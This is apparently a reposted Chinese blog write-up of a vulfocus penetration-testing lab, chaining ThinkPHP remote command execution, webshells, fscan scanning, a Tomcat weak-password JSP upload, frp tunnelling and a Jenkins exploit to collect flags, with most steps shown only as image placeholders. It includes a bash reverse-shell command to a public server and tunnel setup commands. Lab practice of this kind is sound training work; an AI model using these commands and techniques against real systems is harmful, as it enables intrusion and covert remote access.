【靶场】双重内网渗透测试场景


前言

使用vulfocus搭建一个内网场景靶场拓扑如下:
在这里插入图片描述
入口有两个,一个是think PHP2.x命令执行和5x的命令执行漏洞,后续需要搭建二层隧道进行渗透测试。

一、开始渗透

目标:
在这里插入图片描述

访问一下:
在这里插入图片描述

使用工具直接拿shell
在这里插入图片描述
使用蚁剑连接:
在这里插入图片描述
写入冰蝎马做简单代理:
在这里插入图片描述
使用冰蝎连接:
在这里插入图片描述
做一下信息收集:
上传fscan扫一下:
上传发现冰蝎命令无法使用感觉应该是权限问题:
在这里插入图片描述
加权限后一样不能使用,就直接使用蚁剑连接上传fscan:
在这里插入图片描述
进入文件检查发现bash没有无法执行:
在这里插入图片描述
这里直接用thinkphp2x的漏洞做横向移动:
在这里插入图片描述
这里直接上传冰蝎马做代理:
在这里插入图片描述
在这里插入图片描述
上传fscan:
在这里插入图片描述
执行扫描:
在这里插入图片描述

二、横向移动

查看扫描结果:
发现tomcat 的ip为192.168.20.1:8080
在这里插入图片描述
这里使用冰蝎简单代理给他代理出来:

在这里插入图片描述
成功代理到本地的8080端口:
注意这种方式不稳定不怕麻烦使用frp代理
在这里插入图片描述
上传webshell:这里是tomcat弱密码漏洞
在这里插入图片描述
上传jsp木马:
在这里插入图片描述
直接用冰蝎连接:
在这里插入图片描述
查看网卡:
在这里插入图片描述
网卡中有30网段:测试是否出网
在这里插入图片描述
目标可以出网进行反弹shell(因为这里的冰蝎隧道不稳定):
这里使用nc做监听:
在这里插入图片描述

bash -i >& /dev/tcp/公网ip/端口 0>&1

这里使用bash编译命令
在这里插入图片描述
在这里插入图片描述
成功反弹:
在这里插入图片描述
这里写入frpc的配置:
使用冰蝎上传frpc包:
在这里插入图片描述
这里发现冰蝎的隧道并不稳定上传10M的文件太大导致没有上传成功,换成wget命令:
直接在公网服务器放安装包使用wget命令下载到本地做隧道:
在这里插入图片描述
测试一下下载:
在这里插入图片描述

在tomcat中下载:
在这里插入图片描述
在这里插入图片描述
解压并配置frpc:
在这里插入图片描述
使用vps上启动frpserver服务:
在这里插入图片描述
在这里插入图片描述

执行./frpc -c frpc.ini

在这里插入图片描述

流量转发过来
在这里插入图片描述
使用proxifier代理到vps的服务器:
在这里插入图片描述
在这里插入图片描述
成功穿出:
接下来做信息收集关闭之前搭建的冰蝎隧道(不稳定且延迟较高):
在这里插入图片描述
直接使用冰蝎连接192.168.30.3:8080的马:
在这里插入图片描述
在这里插入图片描述
这个相对稳定:上传fscan做信息收集

在这里插入图片描述
加个权限启动扫描:
在这里插入图片描述
Jenkins的ip为192.168.30.1:端口为8080使用poc攻击:
在这里插入图片描述
在这里插入图片描述
这里直接拿flag:
在这里插入图片描述
到这里我们四台的flag全部找到可以提交了:

提交flag

在这里插入图片描述
这里只有四个场景但是不知道为啥有5个flag并没有找到另外的flag应该是靶场的bug,这里不在深究

总结

这个场景还是比较简单,如果目标不出网,也可以在tomcat上做frpserver服务,让他又当客户机又当服务器,同时还可通过msf做代理和上线cs做权限维持,下次使用这种方式做测试,试试效果如何。

猜你喜欢

转载自blog.csdn.net/qq_39583774/article/details/130947754